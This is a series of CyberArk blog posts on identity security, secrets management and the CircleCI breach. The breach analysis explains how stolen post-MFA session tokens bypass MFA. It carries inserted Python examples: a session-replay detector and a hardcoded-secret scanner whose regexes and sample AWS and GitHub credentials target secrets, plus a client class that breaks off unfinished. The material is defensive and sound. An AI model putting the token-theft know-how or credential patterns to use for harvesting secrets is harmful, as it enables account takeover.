Intelligent identity threat detection efforts require a holistic view of user behavior that helps teams spot only the relevant patterns. Identity Security Intelligence can help organizations reduce the risk of identity-centric attacks by eliminating silos between teams, documenting processes and integrating technologies to rapidly detect and respond to identity-centric threats.

Learn more about Identity Security Intelligence.

Sam Flaster is a director of product marketing at CyberArk.

Secrets Management: Meeting Developers Where They Are
https://www.cyberark.com/blog/secrets-management-meeting-developers-where-they-are/
Wed, 01 Mar 2023 20:00:47 +0000

There’s always a balancing act when it comes to building and deploying cloud-native applications in environments like Amazon Web Services (AWS). The whole point of moving production to the cloud is that developers can move faster than ever before, innovating and shipping new features on a daily basis. But that same speed can be an organization’s downfall if development outpaces security processes and accidentally exposes secrets or other credentials to potential attackers.

On the one hand, you’ve got 71% of organizations developing and deploying cloud-native apps, according to the Enterprise Strategy Group’s (ESG) 2023 Technology Spending Intentions Survey. On the other hand, 70% of organizations from another ESG report believe they have more than 50 secrets embedded just in their Git repositories, and 31% experienced a cybersecurity incident where secrets were stolen from a source code repository. Hard-coded secrets or secrets that aren’t properly rotated or revoked can become vulnerabilities that cyberattackers can exploit to gain access to an organization’s critical systems and resources.

Exposure of secrets, whether hard coded or compromised, can have a massive impact on the business. For example, in the recent breach of CircleCI, a continuous integration/continuous deployment (CI/CD) tool, the attacker stole the identity of an employee with privileges to create production access tokens. The attacker was able to exfiltrate data that included customer environment variables, tokens and keys, which could be used to gain access to customer systems. That led to impacted customers having to rotate all secrets stored on CircleCI, a potentially labor-intensive process if they do not have a centralized secrets management solution. Beyond the risk of a potential breach, impacted organizations spent time and resources that could be dedicated to other tasks on quickly revoking access and updating keys across their environments.

Who Owns Cloud-native Secrets Management?

So we know secrets management is a critical task, especially when working in cloud environments like AWS. AWS now has a native tool, AWS Secrets Manager, that many developers use to store application secrets.

It’s not fair or effective to put the burden of securing secrets solely on the developers’ shoulders. They’re trained in building and deploying applications, and their performance is evaluated on how well (and how fast) they can accomplish those projects. Securing secrets, maintaining least privilege access and other security principles aren’t traditionally their responsibility, and expecting them to focus on these security tasks instead of their development priorities can lead to production delays. If different project teams are all managing secrets for their project separately in multiple vaults (or multiple instances of AWS), it can be hard to get visibility, apply consistent policies and audit access across projects and accounts. All that makes it harder to respond to security events like the CircleCI breach when they happen.

A better solution is to have security teams handle secrets management across the enterprise, including for cloud-native applications. However, this can’t be at the risk of slowing developer velocity. Security processes that require code changes or changes to developer workflows will inevitably introduce delays and create frustration for cloud-native developers who need to move fast to meet business directives. Instead, security teams need a way to manage secrets for cloud-native applications in a way that is seamless for developers and meets them where they are (i.e., AWS), rather than trying to force a solution that slows them down or adds more work to their plates.

It’s a balancing act. Security teams want to centralize secrets management across all projects and accounts. Meanwhile, cloud architects and developers want to meet security policies without changing their existing processes by continuing to use native tools such as AWS Secrets Manager.

What Makes an Effective Cloud-Native Secrets Management Solution?

To better manage secrets for cloud-native environments like AWS, security teams need a solution that’s easy to use and leverages existing workflows, processes and tools. That makes it easier for developers to incorporate in their day-to-day operations and doesn’t place undue stress on the security teams trying to manage a large volume of secrets.

An effective secrets management solution for cloud-native environments provides six key benefits:

  1. It provides visibility, control and management over all secrets across projects and accounts through a single pane of glass, mitigating vault sprawl across multiple AWS instances and projects.
  2. Management, rotation and synchronization of secrets is simplified in a way that is transparent to developers, so critical functionality isn’t interrupted.
  3. Security teams can easily find and manage secrets across existing instances of their native cloud secrets management tools like AWS Secrets Manager.
  4. The developers’ preference for choice is fulfilled, as they can maintain their native user experiences with AWS Secrets Manager.
  5. Automatic rotation of secrets held in cloud-native secrets managers increases operational efficiency for both security and developers (think of how much time and effort this would save in the event of a security incident like CircleCI’s recent breach).
  6. Transitioning workloads to AWS is accelerated by enabling the same security policies to be enforced across hybrid and cloud environments.

With a centralized solution that works with native cloud secrets managers rather than replacing them, security and developers can balance their needs and deliver secure, well-built applications for their organizations. The right solution can help security teams enhance secrets management for AWS-based applications and help mitigate risk.

To learn more, read the analyst report from ESG’s Jack L. Poller, “Enhancing Secrets Management for AWS Applications.”

Why the Phishing Blame Game Misses the Point
https://www.cyberark.com/blog/why-the-phishing-blame-game-misses-the-point/
Wed, 22 Feb 2023 06:23:43 +0000

Phishing is a big problem that’s getting even bigger as cybercriminals find new ways to hook employees. With threats coming from every direction – emails on company computers, text and voice messages on mobile devices and in personal communications channels, malicious typosquatting sites, phony marketing QR codes and more – it’s only a matter of time before someone trips up and opens or clicks on something they shouldn’t. When they do, and that phishing attack leads to a damaging data breach, who’s at fault?

The Phishing “Click This, Not That” Contradiction

In the physical world’s airports, train stations and other high-traffic areas, law enforcement posts signs warning people to watch out for suspicious behavior. While public vigilance is critical, citizens aren’t expected to identify shoplifters, challenge those who run red lights or stop unauthorized visitors from entering buildings.

Yet, in the digital world, workforce users (usually outside the IT security department) have become frontline phishing gatekeepers. And they’re flooded with contradictory guidance of “click this, not that.” Think of the HR executive whose job involves reviewing resumes that arrive daily through email, web applications and social media. Or the employee who receives regular emails, supposedly from IT, instructing them to click on links to review company policies and download required software updates. Is it reasonable to expect these people to assess every attachment and link, detecting the malicious from the legitimate with 100% accuracy, 100% of the time? And when a user does fall for a phishing attempt and realizes it too late, are they empowered to report it, or do they try to cover it up, embarrassed or afraid of potential consequences?

Phishing Awareness is Just the Start

Don’t get me wrong. Security is a team game everyone must play, and phishing education is critical. In fact, security leaders identify security awareness training as one of the top three most effective components of a defense-in-depth strategy to combat ransomware. A large body of research shows that regular phishing education can make a positive difference and promote the team game mentality. Teaching users about the real-world ramifications of risky behavior, such as forwarding personal emails to work accounts, can also help dispel the myth that security teams are like all-powerful seatbelts – there to protect people from harm, no matter how fast they’re driving. But phishing education isn’t enough on its own, and phishing prevention strategies that center on human responsibility are unlikely to succeed.

The UK National Cyber Security Centre (NCSC) recently published a post that piqued my interest, asking, “What would we do differently if we were actually encouraging users to click links without fear?” It’s a theoretical question, of course, but it forces an important perspective shift.

What Would It Take to Click Without Fear?

Cyberintruders are constantly innovating and will always find ways to get inside environments. This is one reason Zero Trust has gained such momentum. It’s built on the assumption that any identity or endpoint could be compromised. Because of this, security must start from an assume breach mindset, which recognizes that all users – whether they work in HR, marketing, finance, development or even the IT department – may get phished.

Instead of trying to control every click, the focus stays on controlling what’s actually controllable. For instance, by enforcing strong authentication everywhere, practicing good credential hygiene and consistently following the principle of least privilege (for both human and non-human identities) to help prevent credential theft. Or by implementing allow-listing and application control to help mitigate malicious downloads.

This security approach isn’t about placing blame; it’s about emphasizing awareness AND putting the right layered defenses in place to find and stop attackers quickly. To that end, the NCSC offers helpful defense-in-depth guidance aimed at preventing phishing email delivery, initial code execution and future harm that’s worth a read.

Enough with the Phishing Blame Game

Humans are biologically wired to blame. When bad things happen to us, we instinctively look for reasons beyond ourselves. Even as onlookers, we crave that “who done it” closure. It’s why major breach reports spark waves of speculation and why human error is a common corporate explanation. Yet while the phishing blame game may help us feel better, we’re missing (or ignoring) the more significant point. That is, fault refers to responsibility; responsibility is rooted in trust; and inherent trust – in anyone or anything – must be stripped entirely from the modern security equation.

Identity Security, centered on intelligent privilege controls, lays the foundation for Zero Trust by limiting access to those who need it and only granting the minimum privilege for the task in question. Read our whitepaper, “Zero Trust’s Evolution,” to learn how Identity Security can help today’s digital and cloud-based enterprises enable Zero Trust while achieving measurable risk reduction, operational efficiency and other bottom-line business outcomes.

 

David Higgins is a senior director in the CyberArk Field Technology Office

How Automated Identity Management Can Help Solve the Compliance Puzzle https://www.cyberark.com/blog/how-automated-identity-management-can-help-solve-the-compliance-puzzle/ Fri, 17 Feb 2023 20:29:03 +0000 https://www.cyberark.com/?p=140657 Word jumble graphic of regulation acronyms

Have you ever received a puzzle as a gift from a well-intentioned friend? They likely thought something along the lines of, “Hey, this person’s into solving problems — I bet they’d love putting together this bad boy on a rainy day.”

The sentiment was spot-on. Puzzles are your thing. But then you see the words “7,000 PIECES!” on the box and think to yourself:

“How… When… In what reality will I be able to solve this puzzle?” Simultaneously, your phone blows up with work emails, your contractor says the furnace broke — and your kids/dogs/both have made a giant mess in the kitchen.

This scenario reflects what it must be like for an IT or security team member to take on the compliance puzzle, as identity management becomes more complex.

Ensuring and demonstrating compliance is a struggle for many organizations. In addition to defending against attacks, IT and security teams are often on point to manage one or more of the following areas:

  • Ensuring transparency for internal and external audits
  • Meeting requirements in complex industry and government regulations like PCI DSS, HIPAA and SWIFT
  • Demonstrating compliance and producing comprehensive reports and/or analytics

 

As Identity Management Challenges Mount, the Stakes of Compliance Get Higher

The work involved in adhering to rules, meeting reporting requirements and avoiding penalties seemingly never stops growing. And there’s always *what’s coming next*…

So, what’s on the rise now? To start, regulations are expanding globally.

World map of regulation mandates

Also on the rise, the costs of getting compliance wrong.

Graphic of mandates and fines

Meanwhile, securing your users’ identities — which includes granting, certifying and revoking access — is essential. But it’s not easy. You’re protecting the enterprise at a time when everything is surging in concert and complexity.

Graphic of increasing organizational size

 

As the Puzzle Pieces Shuffle, Malicious Actors Look for Vulnerabilities to Exploit

Attackers are fully aware of the challenges IT and security teams are facing. They’re on the lookout for the troublesome trio of unchecked access, orphaned accounts and privilege creep — all of which can happen if an organization lacks strong controls for managing access-related compliance reviews and certifications.

Chart of employee churn

Consider the far-reaching effects of a breach stemming from a lack of consistent identity management processes. In this hypothetical scenario, let’s say an attacker exploited the account of a user who had accumulated too much access to sensitive resources. First and foremost, you’d need to deal with the impact of the breach itself — in this case, data theft involving customer information. But you’d also be facing ripple effects that could harm your enterprise’s operations.

No doubt, regulatory fines can be a huge impediment to your plans for growth and transformation. But how can an enterprise recoup from the impact of damaged trust — among its customers, partners, employees and any number of other key stakeholders?

Amid these pressures, it’s no wonder that most enterprise leaders admit that they lack the confidence to solve the compliance puzzle. It’s staring them in the face daily, not unlike the half-completed jigsaw puzzles that mock us from their arrogant perch atop so many coffee tables.

Graphic of compliance puzzle

But solve the puzzle we must.

The million-to-gazillion dollar question: How do you gain the visibility and control you need to ensure that the evolving nature of privilege doesn’t put your organization in jeopardy? This applies to a wide range of identities and concerns, including:

  • The potentially risky actions employees can take within applications containing sensitive data.
  • The entitlements your privileged users have to access safes and privileged accounts.
  • The authorizations and permissions your developers and operations teams have in cloud environments.

 

Six Identity Management Best Practices to Help You Solve the Compliance Puzzle

Here are some best practices for strengthening compliance and auditing capabilities:

  1. Create a unified view of who has privileges and authorization to what resources, with capabilities for discovering, adjusting, certifying and revoking access.
  2. Integrate access certification processes with your PAM program, and continuously discover who has access to what safes and privileged accounts across the enterprise.
  3. Automate governance processes to ensure checks and balances — for example, continuously enforcing least privilege with reviews and certifications scheduled for recurring dates.
  4. Leverage contextual data about users so that managers can take risk scores into account before making access decisions.
  5. Empower your team and auditors with analytics and reporting capabilities to help identify potential compliance issues, offer detailed audit trails and allow for custom reports.
  6. Integrate compliance tools with your overall Identity Security framework, which can help prevent silos and ensure compliance of all identities, including privileged or administrative accounts.

Learn how CyberArk solutions such as CyberArk Identity Compliance can help you gain the capabilities, controls – and confidence – to solve the global compliance puzzle.

Deconstructing Identity Security https://www.cyberark.com/blog/deconstructing-identity-security/ Mon, 13 Feb 2023 19:00:17 +0000 https://www.cyberark.com/?p=140088

Most companies now recognize the serious and insidious nature of cybersecurity threats. But many fail to grasp that the digital transformation, remote work, automation and cloud migration activities of the last few years have turbocharged the number of identities seeking access to data and critical business systems. This surge in identities has exponentially increased the likelihood of cyberattacks, undercutting the effectiveness of traditional identity and access management (IAM) paradigms.

In the modern enterprise, nearly every employee has multiple identities on the network and uses several devices to access business systems. According to the CyberArk 2022 Identity Security Threat Landscape Report, the average staff member accesses more than 30 applications and accounts, requiring them to remember and manage countless passwords and repeatedly authenticate themselves to systems and applications. These employees often collaborate with third-party partners who also access sensitive company data and assets to do their jobs. At the same time, machine identities outnumber human identities by a factor of 45:1, the CyberArk report found.

According to the latest Verizon Data Breach Investigations Report, 80% of Basic Web Application Attacks (BWAA) start with compromised credentials. Identity has become the latest high-value target in the cybersecurity battleground. Yet the proliferation of identities has made it difficult for security professionals to strike the right balance between safeguards and speed to do what’s necessary to protect the complex web of endpoints, devices, cloud workflows and SaaS solutions. And that’s without making it overly difficult for the enterprise or leaving gaps that bad actors can easily exploit.

Most traditional IAM tools were not built with a security-first approach, nor were they designed to manage the broad number of human, application and machine identities that exist across on-premises data centers, SaaS environments and hybrid, multi-cloud infrastructure. This identity challenge is compounded by using multiple siloed tools that create management headaches due to a lack of automation and poor visibility. Given the stakes, it’s time for organizations to recalibrate and make identity the centerpiece of their security strategies.

A New Vision for Identity Management

So what’s the best way to secure all these types of identities within an organization? It starts with a risk-aligned Identity Security approach that embraces the core concepts of Zero Trust. This includes acknowledging that attacks will occur and enforcing intelligent privilege controls consistently to secure access for all identities – human and machine – and flexibly automate the identity lifecycle. By layering these with continuous threat detection and prevention capabilities, organizations are empowered to spot threats earlier and stop identity-driven attacks in motion. The ultimate goal is to enable users with quick and secure access to necessary resources, while trusting nothing and verifying everything behind the scenes.

The modern version of Identity Security rests on four pillars:

Modern Identity Security Defined

To get a picture of how Identity Security might work in the real world, consider a DevOps specialist who is regularly accessing highly sensitive CI/CD resources and tools with the help of a bot that takes care of some of the more mundane housekeeping work. With an Identity Security approach, both the DevOps specialist and the bot (a machine identity) are covered by intelligent privilege controls, allowing them entry to the necessary cloud workspace, but within the context of minimal required access for the least amount of time necessary. Say that developer eventually leaves the position. A modern Identity Security platform with flexible automation and orchestration will automatically shut off access and permissions at just the right time, while the bot retains access and can be redeployed to a new team member.

Identity Security Best Practices

With the basics in place, there are several Identity Security best practices to consider. Among them:

  • Security starts at the front door. Different types of users need access to various resources, so Identity Security must start at the endpoint. Embrace enabling controls like adaptive multifactor authentication (MFA) for endpoints and continuous authentication, so that when a user elevates privileges to launch an application, the appropriate controls are applied at that moment. Beyond least privilege and application control, look for solutions that support policy-based, audited just-in-time elevation sessions, credential defense, workforce password management and ransomware protection, among other capabilities.
  • Don’t overlook the cloud. The cloud ushers in many Identity Security challenges, including misconfigurations and over-permissioned accounts. Look for platforms that can detect and remove excessive permissions, provide actionable remediation and promote just-in-time privileged access.
  • Remember the machine challenge. Centralized secrets management can help remove embedded API keys and secrets from applications and automation tools and help drive authentication across a hybrid, multi-cloud environment.

Centered on intelligent privilege controls, Identity Security is the next evolution of protection, providing a holistic and flexible framework that keeps companies focused on business outcomes and a step ahead of adversaries.

Chris Maroun is a senior director in the CyberArk Field Technology Office.

Udi Mokady to Step into Executive Chair Role and Matt Cohen to Become CEO https://www.cyberark.com/blog/udi-mokady-steps-into-executive-chair-role-and-matt-cohen-to-become-ceo/ Thu, 09 Feb 2023 12:02:35 +0000 https://www.cyberark.com/?p=140058

Today, CyberArk announced that our founder and CEO Udi Mokady will step into the role of Executive Chairman and our Chief Operating Officer, Matt Cohen, will become CyberArk’s CEO, effective April 3, 2023. Together, Udi and Matt make a great team and we’re excited for this next chapter in CyberArk’s journey.

With a powerful combination of the best people, an amazing culture, and the industry’s leading platform for Identity Security, our future is bright and we can’t wait for what’s next. Hear directly from Udi and Matt on this important announcement.

Post-CircleCI Breach, Focus on Identity Security Strategy https://www.cyberark.com/blog/post-circleci-breach-focus-on-identity-security-strategy/ Tue, 07 Feb 2023 22:27:22 +0000 https://www.cyberark.com/?p=139974 Post-CircleCI Breach, Focus on Identity Security Strategy

When news of the recent CircleCI breach broke, developers everywhere scrambled to rotate tokens and remove hardcoded secrets stored in the popular CI/CD platform to minimize their exposure. Now that the dust has settled and more details are available, we’re reexamining the CircleCI attack chain to highlight the importance of a holistic Identity Security strategy in thwarting future damaging attacks.

Analyzing the CircleCI Identity Attack Chain

1. Infect an Employee’s Endpoint Device

The laptop of a CircleCI engineer – an employee with privileged access rights – was infected with malware, which was not detected by the company’s antivirus software.

Learning: Mitigating the risk of social engineering and phishing attacks while closing other endpoint security gaps requires a strong mix of integrated tools and processes – there isn’t one tool that can do it all. Endpoint privilege management is one foundational control that every organization needs to consider carefully. Removing local admin rights, replacing them with controlled just-in-time elevation and enforcing least privilege can help ensure that an honest mistake does not lead to downloading and installing malware in the first place.

2. Steal Employee Session Tokens

An unauthorized third party used the malware to steal the employee’s single sign-on session tokens. By keeping the employee’s web sessions open and active, the attacker successfully bypassed multifactor authentication (MFA) safeguards in place.

Learning: Stealing session tokens, cookies and other post-MFA tokens is an increasingly popular technique because it lets attackers bypass authentication and authorization prompts. Once a legitimate user has authenticated with MFA, the resulting token or cookie is stored on the endpoint as a bearer of that trust, and an attacker who copies it can present it for later access until it expires or is revoked. This technique is also relatively easy to pull off. While many attacks (including this CircleCI incident) require elevated privileges to install malicious software on an endpoint, token and cookie hijacking can be accomplished without them, because the tokens sit in the user’s own browser profile and are readable by any process running as that user.

As more companies embrace adaptive MFA controls to maintain balance between security and simpler and smoother user experience, token and cookie hijacking will continue to gain traction as these techniques provide a way of bypassing MFA measures. To mitigate risk, MFA systems should be strengthened with endpoint privilege security controls that detect and block credential theft – including post-MFA token theft – at the start of an attack before they’re used to access critical business and cloud services. An all-encompassing approach will also give security teams a flexible, yet consistent way to implement privilege and application control. Incorporating capabilities to monitor and audit end-user activity in designated web applications can also help secure user sessions from threats originating on the endpoint and curb prohibited data exfiltration by workforce users, such as downloading or copying sensitive files.

3. Establish Persistence and Move Laterally

By using the stolen tokens, the attackers were able to impersonate the CircleCI engineer to move laterally and vertically through the network and establish persistence. Eventually, the attacker was able to gain access to a subset of the company’s production systems.

Learning: According to CircleCI’s investigation, the attacker spent a few days conducting reconnaissance before stealing data. When organizations have continuous threat detection capabilities in place, dwell times like this represent a big opportunity to detect and block attacks from causing damage. And by applying AI-based user behavior analytics, one careless move (such as accessing the network from an unusual location or time of day while doing recon) could be all it takes to unmask the attacker impersonating a legitimate privileged user.
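Detecting this kind of misuse is mostly a matter of noticing that a session token is being presented from somewhere it was not issued. The following is an added example, not CircleCI’s or CyberArk’s code: it binds each session to the client fingerprint and the /24 network it was first seen from, flags later uses that do not match, and separately flags privileged actions outside an assumed working-hours baseline. The events, the user, the baseline hours and the list of privileged actions are all constructed for illustration.

```python
from datetime import datetime
from ipaddress import ip_address, ip_network

# Constructed sample events, not CircleCI's logs: one SSO session token used
# first by the legitimate engineer from the office network, then replayed
# by an attacker from a different network and client, outside working hours.
SAMPLE_EVENTS = [
    {"ts": "2022-12-19T09:02:11Z", "user": "eng1", "session": "sess-A1",
     "src_ip": "203.0.113.10", "ua": "Mozilla/5.0 (Macintosh) Chrome/108",
     "action": "view_dashboard"},
    {"ts": "2022-12-19T09:15:40Z", "user": "eng1", "session": "sess-A1",
     "src_ip": "203.0.113.10", "ua": "Mozilla/5.0 (Macintosh) Chrome/108",
     "action": "view_pipeline"},
    {"ts": "2022-12-19T23:41:07Z", "user": "eng1", "session": "sess-A1",
     "src_ip": "198.51.100.77", "ua": "python-requests/2.28",
     "action": "list_projects"},
    {"ts": "2022-12-22T02:10:55Z", "user": "eng1", "session": "sess-A1",
     "src_ip": "198.51.100.77", "ua": "python-requests/2.28",
     "action": "generate_production_token"},
]

# Assumed (hypothetical) baseline for this user: 07:00-19:59 UTC.
WORK_HOURS = range(7, 20)
PRIVILEGED_ACTIONS = {"generate_production_token", "read_env_vars"}


def _parse_ts(ts):
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def detect_session_anomalies(events):
    """Return findings as (timestamp, session, reason) tuples.

    Each session token is bound to the client fingerprint (User-Agent) and
    the /24 network it was first seen from. Later uses that do not match are
    treated as possible token replay. Privileged actions outside the user's
    working hours are flagged on their own, because reconnaissance and token
    minting by an impersonator tend to happen while the real user is away.
    """
    findings = []
    bound = {}  # session id -> (first network, first user agent)
    for ev in sorted(events, key=lambda e: _parse_ts(e["ts"])):
        sid = ev["session"]
        net = ip_network(f"{ev['src_ip']}/24", strict=False)
        if sid not in bound:
            bound[sid] = (net, ev["ua"])
        else:
            first_net, first_ua = bound[sid]
            if ev["ua"] != first_ua:
                findings.append((ev["ts"], sid, "user-agent changed mid-session"))
            if ip_address(ev["src_ip"]) not in first_net:
                findings.append((ev["ts"], sid, "source network changed mid-session"))
        if ev["action"] in PRIVILEGED_ACTIONS and _parse_ts(ev["ts"]).hour not in WORK_HOURS:
            findings.append((ev["ts"], sid, "privileged action outside working hours"))
    return findings


def sessions_to_revoke(findings):
    """Session ids to invalidate server-side, forcing a fresh MFA challenge."""
    return {sid for _, sid, _ in findings}


if __name__ == "__main__":
    found = detect_session_anomalies(SAMPLE_EVENTS)
    for ts, sid, reason in found:
        print(f"{ts} {sid}: {reason}")
    print("revoke:", sessions_to_revoke(found))
```

Attackers who replay a copied cookie frequently copy the User-Agent string as well, so the network check and the behavioral check carry more weight than the fingerprint check. The useful response to any finding is to revoke the session server-side rather than letting the stolen token stay valid until it expires.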

4. Gather and Exfiltrate Data

According to CircleCI, “Because the targeted employee had privileges to generate production access tokens as part of the employee’s regular duties, the unauthorized third party was able to access and exfiltrate data from a subset of databases and stores, including customer environment variables, tokens, and keys.” Customers were urged to rotate “any and all secrets” stored in CircleCI, review their own system logs and watch out for suspicious activity in integrated SaaS applications and public cloud environments.

Learning: For most organizations, manually rotating every secret isn’t a simple exercise. For one thing, there are tons of secrets out there. More precisely, there are 45 non-human identities for every human identity, and 68% of them use secrets and other credentials to access sensitive corporate resources. Second, these secrets are often hardcoded to save time and effort and can be found in source code in private or even public repositories (e.g., on GitHub), scripts, configuration files and CI/CD pipeline code. So when an incident, such as a supply chain compromise, creates an urgent need to rotate these secrets, developers often end up losing time manually hunting them down before they can rotate them. Meanwhile, attackers actively target hardcoded secrets to gain high-level access and escalate privileges, as seen in last year’s Uber breach.

The CircleCI breach is just one of many recent reminders that intelligent privilege controls must cover every single identity – not just those linked to people. Non-human and machine identities – and the secrets and other credentials they use must be managed in a similar fashion. A centralized secrets management system makes it possible to authenticate, authorize and audit non-human access, while automatically rotating credentials, when needed, and removing static secrets from all scripts and source code.
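Hunting for those hardcoded secrets is exactly the work developers lost time on after the incident. The scanner below is an added example, not part of the original post or of any CyberArk product: it walks a set of files, matches well-known token formats first (the AWS access key ID and GitHub personal access token prefixes), then falls back to a generic credential-assignment pattern filtered by Shannon entropy so that references such as os.environ[...] are not reported. The repository contents are constructed; the AWS values are the example credentials used in AWS’s own documentation, not live keys.

```python
import math
import re
from collections import Counter

# Constructed sample repository contents, not code from any real project.
# Two files carry hardcoded credentials; app.py reads its password from the
# environment at runtime and should produce no finding.
SAMPLE_REPO = {
    ".circleci/config.yml": (
        "version: 2.1\n"
        "jobs:\n"
        "  deploy:\n"
        "    environment:\n"
        "      AWS_ACCESS_KEY_ID: AKIAIOSFODNN7EXAMPLE\n"
        "      AWS_SECRET_ACCESS_KEY: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n"
        "    steps:\n"
        "      - run: echo \"$DEPLOY_TOKEN\" | ./deploy.sh\n"
    ),
    "deploy.ps1": (
        "# Constructed: the kind of script that embeds an admin password\n"
        "$PamPassword = \"Zq7!vR2#mK9pL4wX\"\n"
        "$env:GITHUB_TOKEN = \"ghp_0123456789abcdefghijklmnopqrstuvwxyz\"\n"
    ),
    "app.py": (
        "import os\n"
        "TOKEN_TTL_SECONDS = 900\n"
        "conn = connect(dsn, password=os.environ[\"DB_PASSWORD\"])\n"
    ),
}

# Well-known token formats are checked first; a generic assignment pattern catches the rest.
SPECIFIC_PATTERNS = {
    "aws-access-key-id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github-pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
}
GENERIC_ASSIGNMENT = re.compile(
    r"(?i)(?:password|passwd|secret|token|api[_-]?key)[A-Za-z0-9_]*\s*[:=]\s*[\"']?([^\s\"']{8,})"
)
ENTROPY_THRESHOLD = 3.5  # bits per character; identifiers and paths sit well below this


def shannon_entropy(value):
    counts = Counter(value)
    n = len(value)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def redact(value):
    """Keep a short prefix so the finding is recognisable without re-leaking the secret."""
    return value[:4] + "..." if len(value) > 4 else "****"


def scan_files(files):
    """Scan {path: content} and return one finding per hardcoded credential."""
    findings = []
    for path, content in files.items():
        for line_no, line in enumerate(content.splitlines(), start=1):
            hit = None
            for kind, pattern in SPECIFIC_PATTERNS.items():
                m = pattern.search(line)
                if m:
                    hit = (kind, m.group(0))
                    break
            if hit is None:
                m = GENERIC_ASSIGNMENT.search(line)
                # The entropy filter keeps references like os.environ[...] out of the results.
                if m and shannon_entropy(m.group(1)) >= ENTROPY_THRESHOLD:
                    hit = ("generic-high-entropy", m.group(1))
            if hit:
                kind, value = hit
                findings.append({"path": path, "line": line_no, "kind": kind,
                                 "preview": redact(value)})
    return findings


if __name__ == "__main__":
    for f in scan_files(SAMPLE_REPO):
        print(f"{f['path']}:{f['line']} {f['kind']} {f['preview']}")
```

Run it as a pre-commit hook or a CI step and treat any finding as a blocker. Entropy filtering reduces noise, but a short dictionary-word password will slip past it, so the list of specific patterns should grow with the token formats in use in your environment.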

A Massive Circle of Impact

The CircleCI breach not only impacted one of the world’s most widely used CI/CD platforms, it also put millions of organizations at risk. By tricking just one employee, the attacker was able to work their way through CircleCI’s corporate IT infrastructure, steal sensitive company data and use hardcoded and unprotected secrets to potentially reach further into customer environments. As a result, CircleCI customers had to pause important work and spend valuable development and DevOps resources updating their own code to mitigate risk and potential exposure.

Protecting your enterprise from future identity-based attacks requires a unified Identity Security strategy that removes silos, enhances visibility and automates time-intensive tasks. Empowered, security teams can enable secure access to all resources – on endpoints, in DevOps pipelines, across cloud environments and everywhere else – to measurably reduce risk and stay one step ahead of threats.

How to Secure Secrets in Multi-cloud Environments https://www.cyberark.com/blog/secure-secrets-in-multi-cloud-environments/ Thu, 02 Feb 2023 22:05:37 +0000 https://www.cyberark.com/?p=139656 How to Secure Secrets in Multi-cloud Environments

It wasn’t too long ago that using a single cloud for some business operations was cutting-edge technology. Now the cloud is essential for accelerating growth, improving efficiency and remaining competitive. Most organizations have multiple cloud environments deployed, in addition to private cloud and on-premises environments. In fact, in a soon-to-release CyberArk survey, 85% of respondents said they would be using three or more cloud service providers by 2023. And developers are building more and more applications in the cloud – 71% of organizations are developing cloud-native applications, according to the Enterprise Strategy Group (ESG) 2023 Technology Spending Intentions Survey.

Automation, DevOps and the rise of cloud environments have led to an explosion of machine (or non-human) identities. Applications, cloud workloads, containers, services and other automated tasks – they all require machine identities. And there are a lot of them. The CyberArk 2022 Identity Security Threat Landscape Report found that machine identities outnumber human ones by a factor of 45 to 1.

More Clouds + More Non-human Identities = More Secrets

These non-human identities all use accounts, credentials and secrets to access critical systems and resources and do their jobs. And the number of secrets that need to be managed is growing.

All this means there are more secrets than ever for security teams to keep track of, scattered across a variety of environments – public cloud, private cloud and on-premises – each with its own methods for storing, accessing and managing secrets. Each secret is a potential vulnerability, as attackers can use compromised secrets to access critical systems and resources. The 2022 Uber breach is just one recent example: hard-coded credentials for a privileged access management (PAM) solution were embedded in a PowerShell script, which the attacker used to gain admin access to all the secrets stored in that system.

This becomes a real headache for security teams to manage as organizations continue down the path of cloud migration and other transformation efforts. Not to mention if applications need to be moved from one environment to another, it can become a time-consuming hassle for development and security teams. And many security teams don’t have the bandwidth to either separately manage secrets in each of the environments and tools where they’re stored or implement and maintain a self-hosted secrets management solution.

That’s where SaaS secrets management comes in.

The Five Benefits of SaaS Secrets Management

A centralized, SaaS-based secrets management solution helps ease a lot of the struggles for both the security and development teams working in hybrid or multi-cloud environments.

  • Reduces vault sprawl. When you’re working in multiple clouds or hybrid environments, the number of separate vaults for credentials and secrets can quickly get overwhelming. Rather than security teams hunting for each vault to rotate and manage passwords and having to bring information from a variety of vaults to create an audit trail, a centralized secrets management solution can give you a single pane of glass in which to work.
  • Enables cloud portability. Part of the beauty of the cloud is that developers can build and deploy applications faster than ever. But by relying on the native secrets management capabilities of the platform the application is built on, you’re locked into using that platform. And that becomes an issue if there comes a time when you need to move an application from one environment to another. With a centralized secrets management solution, you can build applications in whichever cloud platform your developers prefer for that specific use case, and move applications from cloud to cloud or from on-prem to cloud without creating a ton of extra work to manage the secrets used in those applications – no need to rewrite apps for a new cloud.
  • Provides a uniform experience for security and developers. Rather than security teams learning multiple different secrets management platforms (which can take time and extra team members), a centralized solution allows security to enforce policies in a unified manner and only operate in one system. This saves time and money on training (from not having to worry about adding additional staff to support every cloud provider), so security can focus on delivering business value.
  • Automates rotation and other security policies. A SaaS-based, centralized solution means that you can automate formerly manual tasks such as secrets rotation and the application of certain security policies. This saves security teams time, especially given the vast number of secrets and identities that need to be rotated on a regular basis across multiple different cloud service providers.
  • Speeds up time-to-value and frees up resources. Having a SaaS-based solution means that you can reap the benefits of the cloud with your secrets management software too. Security teams don’t have to worry about operating and maintaining their own secrets management solution (or multiple solutions), but instead can focus their time and attention on the crucial security tasks they need to complete.
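The portability and rotation points above carry a consumer-side requirement that is easy to overlook: application code must fetch secrets at runtime through one interface and cope with the value changing underneath it. The following is an added example, not CyberArk’s or any vendor’s SDK, of a provider-agnostic client with a short-lived cache that recovers from a rotation by refetching exactly once when the downstream system rejects the cached value. The in-memory provider and the fake database are constructed stand-ins for a real secrets store and a real target system.

```python
import time


class AuthError(Exception):
    """Raised by a downstream system when the presented secret is no longer valid."""


class InMemoryProvider:
    """Stand-in for a centralized secrets store (hypothetical; no vendor API is implied)."""

    def __init__(self, secrets):
        self._secrets = dict(secrets)
        self.fetch_count = 0

    def fetch(self, name):
        self.fetch_count += 1
        return self._secrets[name]

    def rotate(self, name, new_value):
        self._secrets[name] = new_value


class SecretsClient:
    """Provider-agnostic consumer: caches secrets for a TTL and recovers from rotation.

    Application code never embeds a secret. It asks the client, and if the
    downstream system rejects a cached value (the secret was rotated since it
    was fetched), the client discards the cache entry, fetches once more and
    retries. A second failure is a genuine authentication problem and propagates.
    """

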